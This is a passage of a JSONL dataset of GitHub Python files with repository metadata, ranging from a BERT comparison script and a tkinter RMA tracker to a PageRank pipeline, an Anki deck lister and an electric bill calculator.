)","repo_name":"xizhang77/CodingInterview","sub_path":"剑指offer/45-Sort-Array-For-Min-Number.py","file_name":"45-Sort-Array-For-Min-Number.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"27710202476","text":"import os\nimport torch\nimport argparse\nfrom sat import get_args, AutoModel\n# from sat.model.official.bert_model import BertModel\n\nargs = get_args()\n\nmodel_type = 'bert-base-uncased'\nmodel, args = AutoModel.from_pretrained(model_type, args)\n\nfrom transformers import BertTokenizer, BertForMaskedLM\ntokenizer = BertTokenizer.from_pretrained(os.path.join('', model_type))\nbert = BertForMaskedLM.from_pretrained(os.path.join('', model_type), output_hidden_states=True)\n\nmodel.eval()\nbert.eval()\nwith torch.no_grad():\n text = [[\"This is a piece of text.\", \"Another piece of text.\"]]\n encoded_input = tokenizer(text, return_tensors='pt', padding=True)\n seq_len = encoded_input['input_ids'].size(1)\n position_ids = torch.arange(seq_len).unsqueeze(0).expand_as(encoded_input['input_ids'])\n hugging_output = bert(**encoded_input)[0]\n print(position_ids)\n model.to('cuda:0')\n swiss_output = model(input_ids=encoded_input['input_ids'].cuda(), position_ids=position_ids.cuda(), token_type_ids=encoded_input['token_type_ids'].cuda(), attention_mask=encoded_input['attention_mask'][:, None, None, :].cuda())[0].cpu()\n # Since we don't use padding_idx for Embedding layers, pad output is largely different between hugging and swiss.\n # You will find it if you calculate error for hugging_output[1] and swiss_output[1].\n # However, pad output is usually not used, it doesn't matter too much.\n print(\"max error:\", (hugging_output[:,0] - swiss_output[:,0]).abs().max())\n print(\"max relative error:\", ((hugging_output[:,0] - swiss_output[:,0]).abs() / torch.max(swiss_output[:,0].abs(), hugging_output[:,0].abs())).max())\n\n# breakpoint()","repo_name":"THUDM/SwissArmyTransformer","sub_path":"examples/bert/inference_bert.py","file_name":"inference_bert.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":743,"dataset":"github-code","pt":"52"} +{"seq_id":"73238198244","text":"#!/usr/bin/env python3\r\n# RMA version 00.01\r\n\r\nfrom os import times\r\nfrom tkinter.constants import BOTTOM, CENTER, COMMAND, E, END, LEFT, NE, NW, RIDGE, RIGHT, S, SE, SW, TOP, W\r\nimport tkinter as tk\r\nimport mysql.connector\r\nfrom time import sleep\r\nimport mysql\r\nfrom datetime import date, datetime\r\nimport csv\r\n\r\n# Creating the App window\r\nwindow = tk.Tk()\r\nwindow.title(\"RMA _ Login\")\r\nwindow.geometry(\"500x300\")\r\nwindow.minsize(500,300)\r\n\r\n# Database login credentials\r\ndbField = \"rma\"\r\nusernameField = tk.Entry()\r\npasswordField = tk.Entry(show=\"*\")\r\nhomePhoto = tk.PhotoImage(file= '\\\\Users\\JohnDana\\Downloads\\homeButton.png')\r\ntempdevice = ['Select an Option']\r\nreasonList = ['Select an Option']\r\n\r\n# Main function selection screen\r\ndef homeMenu():\r\n clearWindow()\r\n window.title(\"RMA _ Home\")\r\n window.update()\r\n window.minsize(500,300)\r\n addButton = tk.Button(text=\"Add Device\",font = ('Arial', 16),height=1, width=12,command=addMenu)\r\n searchButton = tk.Button(text=\"Search Device\",font = ('Arial', 16),height=1, width=12,command=searchMenu)\r\n editButton = tk.Button(text=\"Edit Device\",font = ('Arial', 16),height=1, width=12,command=editDevice)\r\n reportButton = tk.Button(text=\"Reports\",font = ('Arial', 16),height=1, width=12,command=generateReports)\r\n addButton.grid(row = 0,column=0,padx=20,pady=20,sticky=SE)\r\n searchButton.grid(row = 0,column=1,padx=20,pady=20,sticky=SW)\r\n editButton.grid(row = 1,column=0,padx=20,pady=20,sticky=NE)\r\n reportButton.grid(row = 1,column=1,padx=20,pady=20,sticky=NW)\r\n window.grid_rowconfigure(0, weight=1)\r\n window.grid_rowconfigure(1, weight=1)\r\n window.grid_columnconfigure(0, weight=1)\r\n window.grid_columnconfigure(1, weight=1)\r\n tempdevice[0] = 'Select an Option'\r\n\r\n# Used for adding devices into the RMA system\r\ndef addMenu():\r\n\r\n # Gets the Device option and reads the database reasons table for the issues related to the device. \r\n # Then passes it to the OptionMenu for the reason list.\r\n def getOption(self):\r\n \r\n deviceTypeString = deviceType.get()\r\n sqlQuery = 'SELECT `'+ deviceTypeString +'` FROM reasons'\r\n \r\n try:\r\n curA.execute(sqlQuery)\r\n tempreasonList = curA.fetchall()\r\n tempreasonList = str(tempreasonList)\r\n tempreasonList = tempreasonList.replace(\",)\", \"\").replace(\" (\",\"\").replace('\"', \"\").replace(\"'\", \"\").replace(\"[\",\"\").replace(\"]\",\"\").replace(\"(\",\"\").replace(\";\",\"\").replace(\"None\", \"\")\r\n tempreasonList = tempreasonList.replace(\",\", \"\\n\").splitlines()\r\n fparsetempList = list(filter(None, tempreasonList))\r\n\r\n reasonList.clear() \r\n \r\n for i in range(len(fparsetempList)):\r\n reasonList.append(fparsetempList[i])\r\n\r\n for i in range(len(deviceMenuOptions)):\r\n if deviceTypeString == deviceMenuOptions[i]:\r\n tempdevice[0] = deviceMenuOptions[i]\r\n else:\r\n pass\r\n \r\n except mysql.connector.errors.ProgrammingError:\r\n print(\"Failed to Query\")\r\n \r\n addMenu()\r\n \r\n def addDevice():\r\n \r\n # Takes the device list string and forms a list seperated by comma or nl.\r\n deviceListAdd = deviceList.get(\"1.0\",END)\r\n deviceListAdd = deviceListAdd.replace(\" \", \"\").replace(\";\",\"\")\r\n parsedeviceList = deviceListAdd.replace(\",\", \"\\n\").splitlines()\r\n fparsedeviceList = list(filter(None, parsedeviceList))\r\n \r\n clearWindow()\r\n window.minsize(500,300)\r\n addPrompt = tk.Label(text=\"Adding Devices to Database...\",font=(\"Arial\",20)).place(relx=\"0.5\",rely=\"0.5\",anchor=CENTER)\r\n window.update()\r\n sleep(1.5)\r\n\r\n # Reads the optionMenu selections in string format\r\n deviceInput = deviceType.get()\r\n reasonInput = reasonFieldType.get()\r\n locationInput = locationType.get()\r\n ownerInput = ownershipType.get()\r\n statusInput = statusType.get()\r\n dateInput = str(date.today())\r\n dateInput = dateInput.replace(\",\",\"-\")\r\n print(dateInput)\r\n\r\n values = []\r\n \r\n # Used for adding new entries into the database\r\n # Currently the system will add multiple entries for the same device to track history ---- Subject to future changes ----\r\n \r\n try: \r\n sqlQuery = \"INSERT INTO rmadata (ID, type, location, owner, reason, status, date) VALUES (%s,%s,%s,%s,%s,%s,%s)\"\r\n for i in range(len(fparsedeviceList)):\r\n tempData = (fparsedeviceList[i],deviceInput,locationInput,ownerInput,reasonInput,statusInput,dateInput)\r\n values.append(tempData)\r\n curA.executemany(sqlQuery,values)\r\n \r\n except:\r\n clearWindow()\r\n window.minsize(500,300)\r\n addPrompt = tk.Label(text=\"Failed to Add to Database\",font=(\"Arial\",20)).place(relx=\"0.5\",rely=\"0.5\",anchor=CENTER)\r\n window.update()\r\n sleep(1.5)\r\n\r\n finally:\r\n rmadb.commit()\r\n clearWindow()\r\n successPrompt = tk.Label(text=\"Success\",font=(\"Arial\",20)).place(relx=\"0.5\",rely=\"0.5\",anchor=CENTER)\r\n window.update()\r\n sleep(1.5)\r\n homeMenu()\r\n \r\n\r\n clearWindow()\r\n curA = rmadb.cursor()\r\n window.title(\"RMA _ Add Device\")\r\n window.minsize(1000,400)\r\n homeButton = tk.Button(image=homePhoto, height=40, width=40,command=homeMenu).place(relx=\"0\", rely=\"0\")\r\n deviceType = tk.StringVar(window)\r\n deviceType.set(tempdevice[0])\r\n deviceMenuOptions = [\r\n \"Tag\",\r\n \"Gateway\",\r\n \"Relay\",\r\n \"Evac Tag\",\r\n \"Checkin Station\",\r\n \"Turnstile Unit\"\r\n ]\r\n deviceMenu = tk.OptionMenu(window, deviceType ,*deviceMenuOptions,command=getOption)\r\n deviceMenu.place(relx=\"0.15\",rely=\"0.2\",anchor=CENTER)\r\n\r\n reasonFieldType = tk.StringVar(window)\r\n reasonFieldType.set(\"Select an Option\")\r\n reason = tk.OptionMenu(window, reasonFieldType, *reasonList)\r\n reason.place(relx=\"0.35\",rely=\"0.2\",anchor=CENTER) \r\n deviceReasonPrompt = tk.Label(text=\"Select Reason:\",font=(\"Arial\",12)).place(relx=\"0.35\",rely=\"0.1\",anchor=CENTER)\r\n \r\n locationType = tk.StringVar(window)\r\n locationType.set(\"Select an Option\")\r\n locationMenuOptions = [\r\n \"Norwalk\",\r\n \"East Hartford\",\r\n \"Triumph\"\r\n ]\r\n locationMenu = tk.OptionMenu(window, locationType ,*locationMenuOptions)\r\n locationMenu.place(relx=\"0.15\",rely=\"0.6\",anchor=CENTER)\r\n locationPrompt = tk.Label(text=\"Set Location\",font=(\"Arial\",12)).place(relx=\"0.15\",rely=\"0.5\",anchor=CENTER)\r\n \r\n ownershipType = tk.StringVar(window)\r\n ownershipType.set(\"Select an Option\")\r\n ownershipMenuOptions = [\r\n \"Triax\",\r\n \"United Rentals\",\r\n \"Gilbane\"\r\n ]\r\n ownershipMenu = tk.OptionMenu(window, ownershipType ,*ownershipMenuOptions)\r\n ownershipMenu.place(relx=\"0.35\",rely=\"0.6\",anchor=CENTER)\r\n ownershipPrompt = tk.Label(text=\"Set Ownership\",font=(\"Arial\",12)).place(relx=\"0.35\",rely=\"0.5\",anchor=CENTER)\r\n \r\n statusType = tk.StringVar(window)\r\n statusType.set(\"Select an Option\")\r\n statusMenuOptions = [\r\n \"RMA\",\r\n \"Serviced\",\r\n \"Retired\"\r\n ]\r\n statusMenu = tk.OptionMenu(window, statusType ,*statusMenuOptions)\r\n statusMenu.place(relx=\"0.55\",rely=\"0.2\",anchor=CENTER)\r\n statusPrompt = tk.Label(text=\"Set Status\",font=(\"Arial\",12)).place(relx=\"0.55\",rely=\"0.1\",anchor=CENTER)\r\n\r\n deviceTypePrompt = tk.Label(text=\"Device Type\",font=(\"Arial\",12)).place(relx=\"0.15\",rely=\"0.1\",anchor=CENTER)\r\n \r\n deviceList = tk.Text()\r\n deviceList.place(width=160,height=200,relx=\"0.7\",rely=\"0.15\")\r\n deviceListPrompt = tk.Label(text=\"Device List:\",font=(\"Arial\",12)).place(relx=\"0.78\",rely=\"0.1\",anchor=CENTER)\r\n deviceListNote = tk.Label(text=\"Input Full Serial:\\n(CCP0301-00004488)\",font=(\"Arial\",8)).place(relx=\"0.78\",rely=\"0.7\",anchor=CENTER)\r\n addButton = tk.Button(foreground = 'blue',font = ('calibri', 14, 'bold'),text=\"ADD\", command=addDevice)\r\n addButton.place(relx=\"0.94\",rely=\"0.88\")\r\n \r\n\r\n# Used for looking up device info\r\n# Possible Future Update (5 or less devices will be output to the window)\r\ndef searchMenu():\r\n\r\n def searchDevice():\r\n searchList = searchBox.get(\"1.0\",END)\r\n searchList = searchList.replace(\" \", \"\").replace(\";\",\"\")\r\n parseSearchList = searchList.replace(\",\", \"\\n\").splitlines()\r\n fparseSearchList = list(filter(None, parseSearchList))\r\n\r\n searchReturnList = []\r\n notFoundList = []\r\n\r\n try: \r\n sqlQuery = 'SELECT * FROM `rmadata` WHERE ID = %s'\r\n for i in range(len(fparseSearchList)):\r\n value = (fparseSearchList[i], )\r\n curA.execute(sqlQuery,value)\r\n tempData = curA.fetchall()\r\n \r\n if tempData == []:\r\n notFoundList.append(value[0])\r\n \r\n else:\r\n searchReturnList.append(tempData)\r\n\r\n if notFoundList != []:\r\n print(\"The Following Devices Were Not Found:\")\r\n print(notFoundList)\r\n\r\n line1 = searchReturnList[0]\r\n print(line1[0])\r\n timeStamp = datetime.now()\r\n filename = \"searchResults-\"+str(timeStamp.year)+\"-\"+str(timeStamp.month)+\"-\"+str(timeStamp.day)+\" \"+str(timeStamp.hour)+\".\"+str(timeStamp.minute)+\".csv\"\r\n with open(filename, 'w') as searchFile:\r\n w = csv.writer(searchFile, delimiter=',',quotechar='|',quoting=csv.QUOTE_MINIMAL)\r\n #w.writerows(notFoundList[0])\r\n w.writerows(searchReturnList)\r\n \r\n \r\n except NotImplementedError:\r\n clearWindow()\r\n window.minsize(500,300)\r\n addPrompt = tk.Label(text=\"Failed to Query\",font=(\"Arial\",20)).place(relx=\"0.5\",rely=\"0.5\",anchor=CENTER)\r\n window.update()\r\n sleep(1.5)\r\n\r\n finally:\r\n rmadb.commit()\r\n clearWindow()\r\n successPrompt = tk.Label(text=\"Search Success\\nFile Downloading\",font=(\"Arial\",20)).place(relx=\"0.5\",rely=\"0.5\",anchor=CENTER)\r\n window.update()\r\n sleep(1.5)\r\n homeMenu()\r\n\r\n clearWindow()\r\n window.title(\"RMA _ Search Device\")\r\n window.minsize(600,350)\r\n\r\n curA = rmadb.cursor()\r\n\r\n homeButton = tk.Button(image=homePhoto, height=40, width=40,command=homeMenu).place(relx=\"0\", rely=\"0\")\r\n searchNote = tk.Label(text=\"Input Full Serials \\n ex..(CCP0301-00004488)\",font=(\"Arial\",12)).place(relx=\"0.5\",rely=\"0.1\",anchor=CENTER)\r\n searchBox = tk.Text()\r\n searchBox.place(width=180,height=220, relx=\"0.5\", rely=\"0.5\",anchor=CENTER)\r\n searchButton = tk.Button(foreground = 'blue',font = ('calibri', 14, 'bold'),text=\"Search\", command=searchDevice)\r\n searchButton.place(relx=\"0.92\",rely=\"0.9\",anchor=CENTER)\r\n outputNote = tk.Label(text=\"This function will export the data as\\na .csv in the application Folder\", font=(\"Arial\",8)).place(relx=\"0.16\",rely=\"0.92\", anchor=CENTER)\r\n \r\n\r\n# Used for Editing Device information\r\ndef editDevice():\r\n clearWindow()\r\n window.title(\"RMA _ Edit Device\")\r\n window.minsize(1000,400)\r\n homeButton = tk.Button(image=homePhoto, height=40, width=40,command=homeMenu).place(relx=\"0\", rely=\"0\")\r\n\r\n# Used to Generate Reports from the database data\r\ndef generateReports():\r\n clearWindow()\r\n window.title(\"RMA _ Reports\")\r\n window.minsize(1000,400)\r\n homeButton = tk.Button(image=homePhoto, height=40, width=40,command=homeMenu).place(relx=\"0\", rely=\"0\")\r\n\r\n\r\n# Clears the widgets from the display \"Cant use destroy due to global wigets (username / password / ...ect)\"\r\ndef clearWindow():\r\n for widget in window.winfo_children():\r\n widget.place_forget()\r\n widget.pack_forget()\r\n widget.grid_forget()\r\n window.update()\r\n return\r\n\r\n# Checks the login credentials\r\ndef passCheck():\r\n inputusername = usernameField.get()\r\n inputpassword = passwordField.get()\r\n clearWindow()\r\n passPrompt = tk.Label(text=\"Connecting to Database...\",font=(\"Arial\",20)).place(relx=\"0.5\",rely=\"0.5\",anchor=CENTER)\r\n window.update()\r\n sleep(1.5)\r\n try:\r\n global rmadb \r\n rmadb = mysql.connector.connect(user=inputusername, password =inputpassword, database = dbField)\r\n homeMenu()\r\n except mysql.connector.Error:\r\n clearWindow()\r\n dbrejectPrompt = tk.Label(text=\"Connection Failed\",font=(\"Arial\",20)).place(relx=\"0.5\",rely=\"0.5\",anchor=CENTER)\r\n window.update()\r\n sleep(1.5)\r\n clearWindow()\r\n main()\r\n\r\n# Main Login Screen\r\ndef main():\r\n heading = tk.Label(text=\"RMA Mannagment System\",font=(\"Arial\",20)).pack(side=TOP)\r\n usernamePrompt= tk.Label(text=\"Username:\",font=(\"Arial\",18)).place(relx=\"0.37\",rely=\"0.4\",anchor=CENTER)\r\n usernameField.place(relx=\"0.62\",rely=\"0.4\",anchor=CENTER)\r\n passwordPromp = tk.Label(text=\"Password:\",font=(\"Arial\",18)).place(relx=\"0.37\",rely=\"0.6\",anchor=CENTER)\r\n passwordField.place(relx=\"0.62\",rely=\"0.6\",anchor=CENTER)\r\n enterButton_main = tk.Button(foreground = 'blue',font = ('calibri', 14, 'bold'),text=\"Login\",\r\n command=passCheck)\r\n enterButton_main.place(relx=\"0.85\",rely=\"0.84\") \r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n\r\nwindow.mainloop()","repo_name":"JDana942/RMA","sub_path":"RMA.py","file_name":"RMA.py","file_ext":"py","file_size_in_byte":13589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28885694821","text":"from operator import add\n\nfrom dagster_pyspark import SparkRDD, pyspark_resource\n\nfrom dagster import (\n Field,\n InputDefinition,\n Int,\n ModeDefinition,\n OutputDefinition,\n Path,\n pipeline,\n solid,\n)\n\nfrom .original import computeContribs, parseNeighbors\n\n\n@solid(\n input_defs=[InputDefinition('pagerank_data', Path)], output_defs=[OutputDefinition(SparkRDD)]\n)\ndef parse_pagerank_data(context, pagerank_data):\n lines = context.resources.spark.spark_session.read.text(pagerank_data).rdd.map(lambda r: r[0])\n return lines.map(parseNeighbors)\n\n\n@solid(input_defs=[InputDefinition('urls', SparkRDD)], output_defs=[OutputDefinition(SparkRDD)])\ndef compute_links(_context, urls):\n return urls.distinct().groupByKey().cache()\n\n\n@solid(\n input_defs=[InputDefinition(name='links', dagster_type=SparkRDD)],\n output_defs=[OutputDefinition(name='ranks', dagster_type=SparkRDD)],\n config={'iterations': Field(Int, is_optional=True, default_value=1)},\n)\ndef calculate_ranks(context, links):\n ranks = links.map(lambda url_neighbors: (url_neighbors[0], 1.0))\n\n iterations = context.solid_config['iterations']\n for iteration in range(iterations):\n # Calculates URL contributions to the rank of other URLs.\n contribs = links.join(ranks).flatMap(\n lambda url_urls_rank: computeContribs(url_urls_rank[1][0], url_urls_rank[1][1])\n )\n\n # Re-calculates URL ranks based on neighbor contributions.\n ranks = contribs.reduceByKey(add).mapValues(lambda rank: rank * 0.85 + 0.15)\n context.log.info('Completed iteration {}'.format(iteration))\n\n return ranks\n\n\n@solid(input_defs=[InputDefinition(name='ranks', dagster_type=SparkRDD)])\ndef log_ranks(context, ranks):\n for (link, rank) in ranks.collect():\n context.log.info(\"%s has rank: %s.\" % (link, rank))\n\n return ranks.collect()\n\n\n@pipeline(mode_defs=[ModeDefinition(resource_defs={'spark': pyspark_resource})])\ndef pyspark_pagerank():\n log_ranks(calculate_ranks(links=compute_links(urls=parse_pagerank_data())))\n","repo_name":"konradmalik/tech-sandbox","sub_path":"Dagster/data/airline-demo/dagster_examples/pyspark_pagerank/pyspark_pagerank_pipeline.py","file_name":"pyspark_pagerank_pipeline.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"17872127175","text":"#!/usr/bin/env python\n# -*- coding: utf-8; -*-\n\nimport sys\n\nfrom wsgiref.simple_server import make_server\n\n\nclass WebApplication(object):\n def __init__(self, value):\n self.value = value\n\n def __call__(self, environ, start_response):\n status = '200 OK'\n headers = [('Content-type', 'text/plain')]\n start_response(status, headers)\n return [str(self.value)]\n\n\nif __name__ == '__main__':\n try:\n val = sys.argv[1]\n except IndexError:\n val = 8888\n\n app = WebApplication(val)\n httpd = make_server('', 8000, app)\n\n try:\n httpd.serve_forever()\n except KeyboardInterrupt:\n pass\n","repo_name":"amperka/gddigits","sub_path":"mockserver.py","file_name":"mockserver.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"5809505610","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n### Getting the list of decks from the database to choose the predefined decks for search and study\n## Saturday, April 30, 2022, 9:24 PM\n\nimport sqlite3\nimport sys\nimport json\nfrom config import ANKI_DATABASE, DEFAULT_DECK\nfrom yaankiFun import log\n\n### INITIALIZING\nMYINPUT= sys.argv[1]\nMYQUERY= \"%\" + MYINPUT + \"%\"\nresult = {\"items\": []}\n\ndb = sqlite3.connect(ANKI_DATABASE)\ncursor = db.cursor()\n\nDECK_LIST = [x.strip() for x in DEFAULT_DECK.split(',') if x]\n\n\ntry:\n cursor.execute(\"\"\"SELECT name, id, mtime_secs\n FROM decks\n WHERE name LIKE ? ORDER BY mtime_secs DESC;\n \"\"\",(MYQUERY,))\n \n rs = cursor.fetchall()\n\nexcept sqlite3.OperationalError as err:\n result= {\"items\": [{\n \"title\": \"Error: \" + str(err),\n \"subtitle\": \"Some error\",\n \"arg\": \"\",\n \"icon\": {\n\n \"path\": \"icons/Warning.png\"\n }\n }]}\n print (json.dumps(result))\n raise err\n\n\nif (rs):\n myResLen = str(len (rs))\n countR=1\n \n for r in rs:\n myIcon = ''\n title = r[0] \n \n subtitle = DEFAULT_DECK\n \n if not DECK_LIST:\n myIcon = 'icons/check-mark.png'\n actionString = \"No preferred decks, Shift-Enter to add this only to the list\"\n DEFAULT_DECK_new = title\n else:\n if title in DECK_LIST:\n myIcon = 'icons/check-mark.png'\n actionString = \"Shift-Enter to remove this deck from the default list\"\n DEFAULT_DECK_new = DEFAULT_DECK.replace(title,'')\n DEFAULT_DECK_new = DEFAULT_DECK_new.rstrip(\", \")\n DEFAULT_DECK_new = DEFAULT_DECK_new.lstrip(\", \")\n else:\n myIcon = ''\n actionString = \"Shift-Enter to add this deck to the default list\"\n DEFAULT_DECK_new = DEFAULT_DECK + \",\" + title\n\n #### COMPILING OUTPUT \n result[\"items\"].append({\n \"title\": title,\n \"subtitle\": str(countR)+\"/\"+myResLen + \"–\" +actionString + \" \" + subtitle,\n \"arg\": DEFAULT_DECK,\n \"mods\": {\n \"shift\": {\n \"subtitle\": \"new DEFAULT_DECK if ↩️: \" + DEFAULT_DECK_new,\n \"arg\": DEFAULT_DECK_new\n }\n },\n \"icon\": {\n \"path\": myIcon\n }\n \n \n \n\n })\n countR += 1 \n\n print (json.dumps(result))\n\n\nif MYINPUT and not rs:\n resultErr= {\"items\": [{\n \"title\": \"No matches\",\n \"subtitle\": \"Try a different query\",\n \"arg\": \"\",\n \"icon\": {\n \"path\": \"icons/Warning.png\"\n }\n \n }]}\n print (json.dumps(resultErr))\n \n","repo_name":"giovannicoppola/alfred-yaanki","sub_path":"src/chooseDecks.py","file_name":"chooseDecks.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"39162683618","text":"from math import sqrt\nfrom itertools import count, islice\n\n\ndef isPrime(n):\n return n > 1 and all(n % i for i in islice(count(2), int(sqrt(n)-1)))\n\n\npos = int(input(\"pos: \"))\nprime = 2\nj = 0\ni = 2\nwhile j < pos:\n if isPrime(i):\n j += 1\n prime = i\n i += 1\nprint(prime)\n","repo_name":"HarelKatz/Euler-Project","sub_path":"007 10001st prime.py","file_name":"007 10001st prime.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15488771210","text":"import os\nfrom functools import reduce\nimport cv2 as cv\nfrom skimage import filters\nimport miscutils\nimport numpy as np\nconfusion = {'TP':[255,255],'FP':[255,0],'TN':[0,0],'FN':[0,255]}\nmethods={}\ndef hybridFactory(func):\n def hybrid(img,fixedThresh=None,sdthresh=None):\n mean,stddev=cv.meanStdDev(img)\n if stddev < sdthresh:\n return cv.threshold(img,fixedThresh,255,cv.THRESH_BINARY_INV)[1]\n return func(img)\n return hybrid\ndef kwargsWrapper(func):\n def wrapped(img,**kwargs):\n return func(img)\n return wrapped\ndef binary(img, fixedThresh=None,sdthresh=None):\n return cv.threshold(img,fixedThresh,255,cv.THRESH_BINARY_INV)[1]\nmethods['binary']=binary\nmethods['otsu'] = kwargsWrapper(lambda img:cv.threshold(cv.GaussianBlur(img,(5,5),0),0,255,cv.THRESH_BINARY_INV+cv.THRESH_OTSU)[1])\nmethods['hybrid otsu'] = hybridFactory(methods['otsu'])\nmethods['mce'] = kwargsWrapper(lambda img: cv.threshold(img,filters.threshold_li(img),255,cv.THRESH_BINARY_INV)[1])\nmethods['hybrid mce'] = hybridFactory(methods['mce'])\nmaps={}\nmaps['br']=lambda x: np.array(miscutils.brMap(x)*255,dtype='uint8')\nmaps['saturation'] = lambda img:cv.cvtColor(img,cv.COLOR_BGR2HSV)[:,:,1]\nparams={}\nparams['br']={'fixedThresh':int(0.25*255),'sdthresh':0.03}\nparams['saturation']={'fixedThresh':29,'sdthresh':4.5}\nimDirectory = r'C:\\Users\\me\\cloud-vision\\threshtester\\images'\nfiles = os.listdir(imDirectory)\ngtDirectory = r'C:\\Users\\me\\cloud-vision\\threshtester\\2GT'\nresults = {mapName: {methodName: {result: 0 for result in confusion} for methodName in methods} for mapName in maps}\nfor file in files:\n print(file)\n imPath = imDirectory + '\\\\' + file\n gtPath = gtDirectory + '\\\\' + file[:file.find('.jpg')] + '_GT.jpg'\n im = cv.imread(imPath)\n gt = cv.imread(gtPath)\n for mapName in maps:\n mapped=maps[mapName](im)\n for method in methods:\n th = methods[method](mapped,**params[mapName])\n pixelMatches = np.array([th.flatten(),cv.cvtColor(gt,cv.COLOR_BGR2GRAY).flatten()]).T\n for result in confusion:\n matches = np.count_nonzero((pixelMatches==confusion[result]).all(1))\n results[mapName][method][result]+=matches\ndef total(x,y):\n return (None,x[1]+y[1])\naccuracy={mapName: {methodName: None for methodName in methods} for mapName in maps}\nfor mapName in results:\n for method in results[mapName]:\n pxTotal = reduce(total,list(results[mapName][method].items()))[1]\n for result in results[mapName][method]:\n results[mapName][method][result]/=pxTotal\n accuracy[mapName][method]=results[mapName][method]['TP']+results[mapName][method]['TN']\n\n","repo_name":"qhuengi/cloud-vision","sub_path":"threshtester.py","file_name":"threshtester.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71223851045","text":"#这里就是 当顾客吃完了然后给生产者发送一个信号,当生产者就接收到信号时,继续做\nimport threading, time, queue\nq = queue.Queue()\n\ndef Produce(name):\n count = 0 # conut表示做的馒头总个数\n while count < 10:\n print('厨师%s在做馒头中...'%name)\n time.sleep(2)\n q.put(count) # 容器中添加馒头\n print('produce%s已经做好了第%s个馒头'%(name, count))\n count += 1\n\n # q.task_done() # 当做完一个馒头后就要给顾客发送一个信号,表示已经做完,让他们吃馒头\n q.join() #等待接收信号,\n print('ok...')\ndef Consumer(name):\n count = 0 # count表示馒头被吃的总个数\n while count < 10:\n time.sleep(2)\n # print('waiting...')\n # q.join()\n data = q.get() # 取馒头, 吃馒头\n print('%seating...'%name)\n time.sleep(4) # 吃馒头用了4s然后给厨师发送一个信号\n q.task_done()\n\n print('\\033[32;1mConsumer %s已经把第%s个馒头吃了...\\033[0m' % (name, data))\n # print('馒头被吃完了...')\n count += 1\nif __name__ == '__main__':\n p1 = threading.Thread(target=Produce, args=('A君',))\n c1 = threading.Thread(target=Consumer, args=('B君',))\n c2 = threading.Thread(target=Consumer, args=('C君',))\n c3 = threading.Thread(target=Consumer, args=('D君',))\n p1.start()\n c1.start()\n c2.start()\n c3.start()","repo_name":"Caesar-Jin/zzzz","sub_path":"hrcode/p100/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29513218021","text":"class Item:\n # If the item does not break/run out of uses, reusable = -1\n # If the item does break/run out of uses, reusable = amount of uses left.\n # If the item is broken/has run out of uses, reusable = 0\n def __init__(self, name, desc, stat, weight, amount=0, reusable=-1):\n self.name = name\n self.desc = desc\n self.stat = stat\n self.amount = amount\n self.reusable = reusable","repo_name":"Elliott43/World-Of-Tree","sub_path":"Items/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7821964372","text":"from datetime import datetime, date\nimport csv, os\nimport pandas as pd\n\nprint(\"THE ELECTRIC BILL PROGRAM\\n\")\n\ndef input_date(msg):\n user_date = input(msg + \" (dd.mm.yyyy) \")\n try:\n datetime.strptime(user_date, \"%d.%m.%Y\")\n return user_date\n except ValueError:\n print('Invalid date. Try again.')\n return input_date(msg)\n \ndef get_parameters(reading, time, day_in, night_in):\n date_rd = datetime.strptime(reading[0][0], \"%d.%m.%Y\")\n date_out = time - date_rd #How many days since the last reading\n day_out = day_in - reading[0][1] #This day reading minus the last day reading\n night_out = night_in - reading[0][2] #This night reading minus the last night reading\n \n return date_out.days, day_out, night_out\n\ndef fare(day, night, days):\n rates = pd.read_csv(\"rates.csv\").values.tolist()\n day_fare = round(((int(rates[0][0]) * day) / 100), 2) \n night_fare = round(((int(rates[0][1]) * night) / 100), 2)\n month_fare = round(((int(rates[0][2]) * days) / 100), 2)\n total_cost = round((day_fare + night_fare + month_fare),2)\n #After tests with my previous bills, I noticed that they round every amount before adding them up.\n #The round in total_cost is just to make sure that it will come back a 00.00 value\n return total_cost\n\ndef readings():\n date = input_date(\"When did you do the reading?\")\n day = int(input(\"How much was the day reading? \"))\n night = int(input(\"How much was the night reading? \"))\n return date, day, night\n\nif not os.path.isfile(\"rates.csv\"): #This will creat the first csv file with the provider rates\n print(\"It looks like this is your first time using this program. Please proceed:\\n\")\n day_rate= input(\"How much is the day unit rate? xx.xx pence/kWh \")\n night_rate= input(\"How much is the night unit rate? xx.xx pence/kWh \")\n daily_rate= input(\"How much is the standing charge rate? xx.xx pence/day \")\n\n data = [[day_rate,night_rate,daily_rate]]\n save = pd.DataFrame(data=data, columns=['Day','Night','Daily'])\n save.to_csv(\"rates.csv\", index=False) #This block saves those values using pandas to create a dataframe \n \n\nif not os.path.isfile(\"electricity.csv\"): #This creates the csv\n print(\"\\nAnd for your first readings:\\n\") #If this one is your first input ever\n date, day, night = readings()\n print(\"Okay. So we will save this for you til next month.\")\n\n data = [[date,day,night]] #This block saves the first csv info\n save = pd.DataFrame(data=data, columns=['Date','Day','Night']) \n save.to_csv(\"electricity.csv\", index=False)\n\n \nelse:\n electricity = pd.read_csv(\"electricity.csv\") #Reads the existing csv with your last readings\n reading = electricity.tail(1).values.tolist()\n print(\"Hello and 